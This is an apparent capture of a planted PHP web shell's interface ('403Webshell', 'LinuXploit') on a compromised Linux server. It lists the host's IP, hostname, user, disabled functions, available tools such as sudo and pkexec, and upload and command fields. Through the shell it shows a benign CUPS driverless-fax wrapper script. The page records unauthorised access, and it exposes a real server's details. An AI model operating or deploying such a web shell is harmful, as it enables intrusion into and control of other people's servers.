403Webshell
Server IP : 85.112.90.236  /  Your IP : 192.168.1.26
Web Server : Apache
System : Linux 85-112-90-236.cprapid.com 6.12.0-211.7.3.el10_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 12:46:58 EDT 2026 x86_64
User : ftechme ( 1002)
PHP Version : 8.2.32
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/usr/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/usr/bin/driverless-fax
#!/usr/bin/sh
#
# Note: This is only a wrapper for driverless-fax, the real work is done by
# driverless
#
# (C) 2020 Nidhi Jain
# (C) 2012-2020 Till Kamppeter <till.kamppeter@gmail.com>
#
# Licensed under Apache License v2.0.  See the file "LICENSE" for more
# information.
#

if [ $# -eq "0" ]; then
    DEVICE_TYPE=FAX /usr/lib/cups/backend/driverless
    elif [ $# -eq "1" ]; then
        DEVICE_TYPE=FAX /usr/lib/cups/driver/driverless "$1"
    elif [ $# -eq "2" ]; then
        DEVICE_TYPE=FAX /usr/lib/cups/driver/driverless "$1" "$2"
    else
        echo "ERROR: Too many arguments"
fi

Youez - 2016 - github.com/yon3zu
LinuXploit